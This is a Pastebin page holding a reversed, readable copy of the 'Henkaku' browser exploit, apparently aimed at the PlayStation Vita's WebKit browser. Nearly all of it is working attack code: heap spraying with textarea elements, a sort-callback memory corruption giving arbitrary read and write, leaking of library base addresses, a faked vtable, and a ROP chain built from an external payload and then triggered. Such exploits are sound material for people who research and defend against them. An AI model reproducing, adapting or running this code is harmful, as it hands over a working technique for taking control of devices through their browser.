API tools faq
paste
Advertisement
Guest User

Henkaku exploit - HTML reversed

a guest
Aug 1st, 2016
2,988
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.40 KB | None | 0 0
raw download clone embed print report
  1. <script src='payload.js'></script>
  2.  
  3. <script>
  4. var r, a, e, t, n, o, l, i, f, v, s, c;
  5. var u, y, w, p, d, g, h, k, b;
  6. var A, U;
  7.  
  8. var m = 0x40 + payload[16/4]; /* 0x40 bytes for ROP header + 1840 bytes for stack*/
  9. m /= 4; /* 476 */
  10.  
  11. var _dview = null;
  12.  
  13. /*
  14. Wrap two uint32s into double precision
  15. */
  16. function u2d(low, hi)
  17. {
  18. if (!_dview)
  19. _dview = new DataView(new ArrayBuffer(16));
  20.  
  21. _dview.setUint32(0, hi);
  22. _dview.setUint32(4, low);
  23. return _dview.getFloat64(0)
  24. }
  25.  
  26. /*
  27. Unwrap uints from double
  28. */
  29. function d2u(d)
  30. {
  31. if (!_dview)
  32. _dview = new DataView(new ArrayBuffer(16));
  33.  
  34. _dview.setFloat64(0, d);
  35. return {low:_dview.getUint32(4),hi:_dview.getUint32(0)}
  36. }
  37.  
  38. // Temporary space to store Element object
  39. var aspace_temp = new Uint32Array(1024);
  40.  
  41. var word1 = 0;
  42. var word2 = 0;
  43.  
  44. function swap(offset)
  45. {
  46. word1 = aspace32[offset/4];
  47. word2 = aspace32[offset/4 + 1];
  48. return((word1 & 0xFFF | (word1 & 0xF0000) >> 4) & 0xFFFF | ((word2 & 0xFFF | (word2 & 0xF0000) >> 4) & 0xFFFF) << 16) >>> 0
  49. }
  50.  
  51. r = 0x4000;
  52. textareas = new Array(r);
  53. aspace_arr = new Array(r);
  54. t = 0x1344;
  55. n = 0x66656463;
  56. o = 0x55555555;
  57.  
  58.  
  59. for (var i = 0; i < aspace_arr.length; ++i)
  60. {
  61. aspace_arr[i] = new Uint32Array(0x1344/4);
  62. var e = document.createElement("textarea");
  63. e.rows = 0x66656463;
  64. textareas[i] = e;
  65. }
  66.  
  67. /*
  68. Spray memory with Element objects
  69. */
  70. for (var i = 0; i < 1024; ++i)
  71. {
  72. var e = document.createElement("textarea");
  73. e.rows = 0x66656463;
  74. textareas.push(e);
  75. }
  76.  
  77. var N = 0x3000;
  78. var W = Array.prototype.constructor.apply(null,new Array(0x3000));
  79. var j = 2048;
  80. var q = new Array(2048);
  81. var z = {};
  82.  
  83. var C = new Array(256);
  84.  
  85. z.toString = function()
  86. {
  87. W.push(12345);
  88.  
  89. for (var r = 0; r < C.length; ++r)
  90. {
  91. var a = Array.prototype.constructor.apply(null, q);
  92. a[0] = 0;
  93. a[1] = 1;
  94. a[2] = 2;
  95. C[r] = a;
  96. } return""
  97. };
  98.  
  99. W[0] = z;
  100. var G = u2d(0x80000000, 0x80000000);
  101.  
  102. for (var i = 1; i < 8192; ++i)
  103. W[i] = G;
  104.  
  105. W.sort();
  106. contents = "";
  107. cur = 0;
  108.  
  109. z.toString = function(){};
  110.  
  111. var I = null;
  112.  
  113. for (var i = 0; i < C.length; ++i)
  114. {
  115. if(C[i].length != j)
  116. {
  117. I = C[i];
  118. break;
  119. }
  120. }
  121.  
  122. var count = 0x20000000 - 0x11000;
  123.  
  124. for(; ; count--)
  125. {
  126. if(I[count] != 0)
  127. {
  128. _dview.setFloat64(0, I[J]);
  129.  
  130. if (_dview.getUint32(0) == t/4)
  131. {
  132. _dview.setUint32(0, 0xEFFFFFE0);
  133.  
  134. I[J] = _dview.getFloat64(0);
  135. _dview.setFloat64(0, I[J - 2]);
  136.  
  137. v = _dview.getUint32(4);
  138. _dview.setUint32(4, 0);
  139. _dview.setUint32(0, 0x80000000);
  140.  
  141. I[J-2] = _dview.getFloat64(0);
  142.  
  143. break;
  144. }
  145. }
  146. }
  147.  
  148. target_aspace = null;
  149.  
  150. for (var i = 0; i < aspace_arr.length; ++i)
  151. {
  152. if(aspace_arr[i].byteLength != t)
  153. {
  154. target_aspace = aspace_arr[i];
  155. break;
  156. }
  157. }
  158.  
  159. if (!target_aspace)
  160. {
  161. alert("failed");
  162. while(1){};
  163. }
  164.  
  165. var aspace32 = target_aspace;
  166. var fkvtable = v;
  167. f = v;
  168.  
  169. /*
  170. Find one of the sprayed Element objects in memory
  171. by looking for the rows of the object
  172. */
  173.  
  174. for (var addr = f/4; addr < f/4 + 0x4000; ++addr)
  175. {
  176. if (aspace32[addr] == 0x66656463)
  177. {
  178. aspace32[addr] = 0x55555555;
  179. textarea_addr = addr * 4;
  180. found_element = true;
  181. break;
  182. }
  183. }
  184.  
  185. if (!found_element)
  186. {
  187. alert("Did not find Element signature");
  188. while(1){};
  189. }
  190.  
  191. /*
  192. Change the rows of the Element object then scan the array of
  193. sprayed objects to find an object whose rows have been changed
  194. */
  195.  
  196. var found_corrupted = false;
  197. var corrupted_textarea;
  198.  
  199. for (var i = 0; i < textareas.length; ++i)
  200. {
  201. if(textareas[i].rows == 0x55555555)
  202. {
  203. corrupted_textarea = textareas[i];
  204. found_corrupted = true;
  205. break;
  206. }
  207. }
  208.  
  209. if (!found_corrupted)
  210. {
  211. alert("Did not find corrupted textarea");
  212. while(1){};
  213. }
  214.  
  215. var vtidx = textarea_addr - 0x70;
  216. var textareavptr = aspace32[vtidx/4];
  217. scewkbase = textareavptr - 0xABB65C;
  218. scelibcbase = swap(scewkbase + 0x85F504) - 0xFA49;
  219. scekernbase = swap(scewkbase + 0x85F464) - 0x9031;
  220. p = swap(scewkbase + 0x85D2E4) - 0x22D65;
  221. d = swap(p + 0x2C688C) - 0x9E5;
  222. g = swap(d + 0x3BC4) - 0xDC2D;
  223. scenetbase = swap(scewkbase + 0x85F414) - 0x23ED;
  224. k = swap(g + 0x18BF4) - 0xD59;
  225. b = swap(k + 0x9AB8) - 0x49CD;
  226.  
  227. // Copy vtable
  228. for (var i = 0; i < 64; i++)
  229. aspace32[fkvtable/4 + i] = aspace32[textareavptr/4 + i];
  230.  
  231. aspace32[vtidx/4] = fkvtable;
  232.  
  233. // Save Element object
  234. for (var i = 0; i < 0x30; ++i)
  235. aspace_temp[i] = aspace32[vtidx/4 + i];
  236.  
  237. // Call setjmp
  238. aspace32[fkvtable/4 + 0x4E] = scelibcbase + 0x14070|1;
  239.  
  240. // Undefine scrollLeft
  241. corrupted_textarea.scrollLeft = 0;
  242.  
  243. // Save payload address (jmp context)
  244. payload_addr = (aspace32[vtidx/4 + 8] ^ (aspace32[vtidx/4 + 9] ^ u + 0x317929) >>> 0) >>> 0;
  245. payload_addr -= 0xEF818;
  246.  
  247. // Restore Element object
  248. for (var i = 0; i < 0x30; ++i)
  249. aspace32[vtidx/4 + i] = aspace_temp[i];
  250.  
  251. payload_stack = payload_addr + 0x40;
  252. payload_code = payload_addr + 0x10000;
  253. payload_off = payload_addr/4;
  254.  
  255. // Build ROP payload
  256. for (var i = 0; i < payload.length; ++i,++payload_off)
  257. {
  258. // Reached the end of ROP header (first 0x770 bytes)
  259. if (i == 476)
  260. payload_off = payload_code/4;
  261.  
  262. switch(relocs[i])
  263. {
  264. case 0:
  265. aspace32[payload_off] = payload[i];
  266. break;
  267. case 1:
  268. aspace32[payload_off] = payload[i] + payload_stack;
  269. break;
  270. case 2:
  271. aspace32[payload_off] = payload[i] + scewkbase;
  272. break;
  273. case 3:
  274. aspace32[payload_off] = payload[i] + scekernbase;
  275. break;
  276. case 4:
  277. aspace32[payload_off] = payload[i] + scelibcbase;
  278. break;
  279. case 5:
  280. aspace32[payload_off] = payload[i] + g;
  281. break;
  282. case 6:
  283. aspace32[payload_off] = payload[i] + scenetbase;
  284. break;
  285. case 7:
  286. aspace32[payload_off] = payload[i] + b;
  287. break;
  288. default:
  289. alert("wtf?");
  290. alert(i + " " + relocs[i])
  291. }
  292. }
  293.  
  294. // Trigger ROPchain
  295. aspace32[fkvtable/4 + 0x4E] = scewkbase + 0x54C8; /* LDM R1 gadget */
  296.  
  297. var rchainaddr = fkvtable + 0x100;
  298.  
  299. aspace32[rchainaddr/4 + 5] = payload_code;
  300. aspace32[rchainaddr/4 + 6] = scewkbase + 0xC048A|1;
  301.  
  302. alert("Welcome to HENkaku!");
  303.  
  304. // Set scrollLeft to ROP chain
  305. corrupted_textarea.scrollLeft = rchainaddr;
  306.  
  307. alert("that's it");
  308. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!